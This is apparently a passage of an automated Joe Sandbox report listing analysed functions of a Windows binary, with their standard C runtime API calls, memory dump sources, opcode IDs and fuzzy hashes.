                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw
                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$pA
                                                                                                                        • API String ID: 2005118841-980797041
                                                                                                                        • Opcode ID: 2f51391e0d331cecd0afc47cd5d54e6b0936c4248778c8fa392301ac8a163122
                                                                                                                        • Instruction ID: f548a48d15b14749fa06765f1a307aefb682e2ca35a4e8faa03297af2b3cfabc
                                                                                                                        • Opcode Fuzzy Hash: 2f51391e0d331cecd0afc47cd5d54e6b0936c4248778c8fa392301ac8a163122
                                                                                                                        • Instruction Fuzzy Hash: 79414B71A00609DFDB00EF99C981F9AB7A4FF04324F54816EE915AB392C778E950CF88
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004018E0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 127COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00401A75
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw
                                                                                                                        • String ID: 0A$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$pA
                                                                                                                        • API String ID: 2005118841-3213267489
                                                                                                                        • Opcode ID: 3dccb9f08c5f50c4cab5c5c54946fbcb14d995abd92c3675e07a08fa25c03085
                                                                                                                        • Instruction ID: 5c836f8a91e7edd1b7dd0bb0fa671a8c187fbff429456b5ff1bf3ece296cfab3
                                                                                                                        • Opcode Fuzzy Hash: 3dccb9f08c5f50c4cab5c5c54946fbcb14d995abd92c3675e07a08fa25c03085
                                                                                                                        • Instruction Fuzzy Hash: 045175B46007099FD720DF19C480B9ABBF4BF08308F10842EE8469B792E7B9E905CF58
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00404FF0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 94COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00403520: std::locale::_Init.LIBCPMT ref: 00403583
                                                                                                                          • Part of subcall function 00401430: std::_Lockit::_Lockit.LIBCPMT ref: 0040143E
                                                                                                                        • std::ios_base::_Addstd.LIBCPMT ref: 0040508C
                                                                                                                          • Part of subcall function 00406F87: std::_Lockit::_Lockit.LIBCPMT ref: 00406F90
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004050B3
                                                                                                                          • Part of subcall function 004088F0: RaiseException.KERNEL32(00000001,0042876C,)i@,?,?,?,?,?,00406929,?,004259A0,?), ref: 00408941
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004050CB
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004050E3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw$LockitLockit::_std::_$AddstdExceptionInitRaisestd::ios_base::_std::locale::_
                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$pA
                                                                                                                        • API String ID: 762193293-980797041
                                                                                                                        • Opcode ID: fa09114c1ceab09b637f4341333f499eee84353d3a1a8a92e7b16c0a570c66ce
                                                                                                                        • Instruction ID: 59313090c745f726c54fe228dad8431c22795c02cae5c134c9d8eca5dd67d99a
                                                                                                                        • Opcode Fuzzy Hash: fa09114c1ceab09b637f4341333f499eee84353d3a1a8a92e7b16c0a570c66ce
                                                                                                                        • Instruction Fuzzy Hash: 0431E471A00609AFDB00EFA5C485B9EB7A8FF04304F50803BE941A7282DB7DE9548B99
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00404390 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 80COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00404405
                                                                                                                          • Part of subcall function 004088F0: RaiseException.KERNEL32(00000001,0042876C,)i@,?,?,?,?,?,00406929,?,004259A0,?), ref: 00408941
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040441D
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00404435
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                        • String ID: <A$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$pA
                                                                                                                        • API String ID: 3476068407-1999480123
                                                                                                                        • Opcode ID: e78100838953dd58edffd7de0b19a2278557bd01b58e6b6a8b662f4e38e5a90d
                                                                                                                        • Instruction ID: a26b9b653a848e5a1e4fd88b7b507687f925aa43fe862ac752a2d18f24b8f42d
                                                                                                                        • Opcode Fuzzy Hash: e78100838953dd58edffd7de0b19a2278557bd01b58e6b6a8b662f4e38e5a90d
                                                                                                                        • Instruction Fuzzy Hash: D5210372A002185FDB00FF95D842B9A73A8AF10314F50C07FEA04A7283DB7CE9058B5C
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004035A0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 145COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$pA
                                                                                                                        • API String ID: 0-980797041
                                                                                                                        • Opcode ID: 415138d8198bcd021200e33a4b394e0748f55b50e31fbbc83f9c817342924e75
                                                                                                                        • Instruction ID: d61993ac0f8d61afcc253a4fcbcec5a1e82a85be40fcef3bd590546a490f6dd9
                                                                                                                        • Opcode Fuzzy Hash: 415138d8198bcd021200e33a4b394e0748f55b50e31fbbc83f9c817342924e75
                                                                                                                        • Instruction Fuzzy Hash: 2451D371A00204AFDB14DF65C485FA9BBA4FF04314F24857EE505AB3D2C779EA01CB88
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00406190 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 122COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004062C9
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004062E9
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00406304
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw
                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$pA
                                                                                                                        • API String ID: 2005118841-980797041
                                                                                                                        • Opcode ID: 541eae5f689cac01d0db482ea120ed3e52d1aa0de85f226e4456ba489a49ca47
                                                                                                                        • Instruction ID: 3417d01bca1196cc4c370dc49f31164d0ede1decbe5c894c909c350a3c70d236
                                                                                                                        • Opcode Fuzzy Hash: 541eae5f689cac01d0db482ea120ed3e52d1aa0de85f226e4456ba489a49ca47
                                                                                                                        • Instruction Fuzzy Hash: 05418C31600209DFDB10EF95C981FAAB7B4BF04314F15807EE916AB392CB39E925CB48
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00405650 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 116COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040577D
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040579D
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004057B8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw
                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$pA
                                                                                                                        • API String ID: 2005118841-980797041
                                                                                                                        • Opcode ID: cf5df79c276de03455cc5a668d323b117f50b0fcc1bc773feb3f30bb5264da1f
                                                                                                                        • Instruction ID: 147243142d3743a1a29a77e2e171d0db9249c93d20319b9481dbf7855d0d2547
                                                                                                                        • Opcode Fuzzy Hash: cf5df79c276de03455cc5a668d323b117f50b0fcc1bc773feb3f30bb5264da1f
                                                                                                                        • Instruction Fuzzy Hash: F841AC35600A048FDB10DF99C541F6AB7B4EF44314F60842EE556AB3D2CB79ED018F88
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00406265 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 68COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004062C9
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004062E9
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00406304
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw
                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$pA
                                                                                                                        • API String ID: 2005118841-980797041
                                                                                                                        • Opcode ID: 2949d861950b8a006633e3b6240c9747ac7bff59e6aee978eced99df068ba94f
                                                                                                                        • Instruction ID: ad769aaf5bd0b6cfe0166b027b189364462f4a961be72870a3b82a682d1e43ac
                                                                                                                        • Opcode Fuzzy Hash: 2949d861950b8a006633e3b6240c9747ac7bff59e6aee978eced99df068ba94f
                                                                                                                        • Instruction Fuzzy Hash: B021C1316002089FDB00EF95C591BADB3A4AF04318F64803FE912A72D2CB7CE925CB08
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00405719 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 68COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040577D
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040579D
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004057B8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw
                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$pA
                                                                                                                        • API String ID: 2005118841-980797041
                                                                                                                        • Opcode ID: fcf42cc5f27b9345e98d94fffd0a7f354ba042805045bf9b5367edfcd061ab22
                                                                                                                        • Instruction ID: 8153d5c4ba6887bb2b568a04cbb5cdd962ad211adaa1d8172950a7c55d0ee827
                                                                                                                        • Opcode Fuzzy Hash: fcf42cc5f27b9345e98d94fffd0a7f354ba042805045bf9b5367edfcd061ab22
                                                                                                                        • Instruction Fuzzy Hash: 4B21BD35A006188FDB10EB84C542BAEB3B4EF04318F64403EE801B7292DB3DE902CB48
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004042E0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 61COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00404355
                                                                                                                          • Part of subcall function 004088F0: RaiseException.KERNEL32(00000001,0042876C,)i@,?,?,?,?,?,00406929,?,004259A0,?), ref: 00408941
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040436D
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00404385
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$pA
                                                                                                                        • API String ID: 3476068407-980797041
                                                                                                                        • Opcode ID: 4d394d1fbf95f66617e0e19cca1672485351865d1dbe08bcd6a32fb70296d559
                                                                                                                        • Instruction ID: ece2ccbc112bdfa77667b6b4abf5f44114a131936559823e2c908ae0f9f47b09
                                                                                                                        • Opcode Fuzzy Hash: 4d394d1fbf95f66617e0e19cca1672485351865d1dbe08bcd6a32fb70296d559
                                                                                                                        • Instruction Fuzzy Hash: E911E371A002189FDB14FB95C842BAA73A89F00318F90847FEA51B32C3DB7CE5068A0D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00415752 Relevance: 12.1, APIs: 8, Instructions: 118COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __mtinitlocknum.LIBCMT ref: 0041576A
                                                                                                                          • Part of subcall function 004096DF: __FF_MSGBANNER.LIBCMT ref: 004096F4
                                                                                                                          • Part of subcall function 004096DF: __NMSG_WRITE.LIBCMT ref: 004096FB
                                                                                                                          • Part of subcall function 004096DF: __malloc_crt.LIBCMT ref: 0040971B
                                                                                                                        • __lock.LIBCMT ref: 0041577D
                                                                                                                        • __lock.LIBCMT ref: 004157C9
                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00426078,00000018,0041A47E,?,00000000,00000109), ref: 004157E5
                                                                                                                        • EnterCriticalSection.KERNEL32(8000000C,00426078,00000018,0041A47E,?,00000000,00000109), ref: 00415802
                                                                                                                        • LeaveCriticalSection.KERNEL32(8000000C), ref: 00415812
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1422805418-0
                                                                                                                        • Opcode ID: ec690c577dffec4b9fc2dbdf4d453561a7c3542cbf688c70d74bd72f47616694
                                                                                                                        • Instruction ID: 246a4bf3ac37695a756972b09a9c01473190d6d01031d133342673a5932f7ce6
                                                                                                                        • Opcode Fuzzy Hash: ec690c577dffec4b9fc2dbdf4d453561a7c3542cbf688c70d74bd72f47616694
                                                                                                                        • Instruction Fuzzy Hash: 4F412831E00A15DBEB10AF69DC457D9BBB0AF41328F20822ED425E72D1D77899A1CBCD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0041235C Relevance: 10.7, APIs: 7, Instructions: 244COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004101F3: __getptd_noexit.LIBCMT ref: 004101F4
                                                                                                                        • _wcscmp.LIBCMT ref: 00412442
                                                                                                                        • _wcscmp.LIBCMT ref: 00412458
                                                                                                                        • ___lc_wcstolc.LIBCMT ref: 00412484
                                                                                                                        • ___get_qualified_locale.LIBCMT ref: 004124A9
                                                                                                                          • Part of subcall function 004193BE: _TranslateName.LIBCMT ref: 004193FE
                                                                                                                          • Part of subcall function 004193BE: _GetLocaleNameFromLangCountry.LIBCMT ref: 00419417
                                                                                                                          • Part of subcall function 004193BE: _TranslateName.LIBCMT ref: 00419432
                                                                                                                          • Part of subcall function 004193BE: _GetLocaleNameFromLangCountry.LIBCMT ref: 00419448
                                                                                                                          • Part of subcall function 004193BE: IsValidCodePage.KERNEL32(00000000,?,?,00000055,?,?,004124AE,?,?,?,?,00000004,?,00000000), ref: 0041949C
                                                                                                                        • GetACP.KERNEL32(?,?,?,?,?,00000004,?,00000000), ref: 00412540
                                                                                                                        • _memmove.LIBCMT ref: 004125F6
                                                                                                                        • __invoke_watson.LIBCMT ref: 0041264B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Name$CountryFromLangLocaleTranslate_wcscmp$CodePageValid___get_qualified_locale___lc_wcstolc__getptd_noexit__invoke_watson_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 90596148-0
                                                                                                                        • Opcode ID: 9d79510b9a8963028df72ce43637284ed81df56b64992d41079ca21edff7000e
                                                                                                                        • Instruction ID: 52076c520bf9d4ca3da0ca006bb5d36946d3681aaaf28217dd7b85d4b0bc0c38
                                                                                                                        • Opcode Fuzzy Hash: 9d79510b9a8963028df72ce43637284ed81df56b64992d41079ca21edff7000e
                                                                                                                        • Instruction Fuzzy Hash: D771B671900255ABDB219B25CD42BEF77B9EF54314F1400ABFD08E2241EB789EE1CB98
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0041A4D6 Relevance: 10.6, APIs: 7, Instructions: 62fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___createFile.LIBCMT ref: 0041A507
                                                                                                                          • Part of subcall function 0041A1EA: GetModuleHandleW.KERNEL32(kernel32.dll,CreateFile2,00000001,0000000C,00000001,?,?,?,00000000,00000109), ref: 0041A204
                                                                                                                          • Part of subcall function 0041A1EA: GetProcAddress.KERNEL32(00000000), ref: 0041A20B
                                                                                                                        • GetLastError.KERNEL32 ref: 0041A530
                                                                                                                        • __dosmaperr.LIBCMT ref: 0041A537
                                                                                                                        • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 0041A54A
                                                                                                                        • GetLastError.KERNEL32 ref: 0041A56D
                                                                                                                        • __dosmaperr.LIBCMT ref: 0041A576
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0041A57F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFileHandleLast__dosmaperr$AddressCloseModuleProcType___create
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2958604131-0
                                                                                                                        • Opcode ID: d6e4110e3fe67822a688418a2aa1f481c7586ca0f66b403c8fa701f713a9d010
                                                                                                                        • Instruction ID: 0de75f1e4a92b452f28d6da5b4b97c91fb7d8b254d09c34c6238b591f6f07d93
                                                                                                                        • Opcode Fuzzy Hash: d6e4110e3fe67822a688418a2aa1f481c7586ca0f66b403c8fa701f713a9d010
                                                                                                                        • Instruction Fuzzy Hash: D111E471A01211AFDB195F65DC48ABE3B36EF01324F14422EF922D72E1D73989A1CB5A
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401DE0 Relevance: 10.6, APIs: 7, Instructions: 50COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00401DE4
                                                                                                                          • Part of subcall function 00406E89: _setlocale.LIBCMT ref: 00406E9A
                                                                                                                        • _free.LIBCMT ref: 00401DF4
                                                                                                                          • Part of subcall function 00407AE6: HeapFree.KERNEL32(00000000,00000000,?,0041026B,00000000,00000001,00000000,?,?,?,004087B6,00406914,00000000), ref: 00407AFA
                                                                                                                          • Part of subcall function 00407AE6: GetLastError.KERNEL32(00000000,?,0041026B,00000000,00000001,00000000,?,?,?,004087B6,00406914,00000000), ref: 00407B0C
                                                                                                                        • _free.LIBCMT ref: 00401E0B
                                                                                                                        • _free.LIBCMT ref: 00401E22
                                                                                                                        • _free.LIBCMT ref: 00401E39
                                                                                                                        • _free.LIBCMT ref: 00401E50
                                                                                                                        • _free.LIBCMT ref: 00401E67
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3515823920-0
                                                                                                                        • Opcode ID: 982e2164bb59cf4b8056dad0feacf5aacf8e6fbb1f88df329891634e594977d6
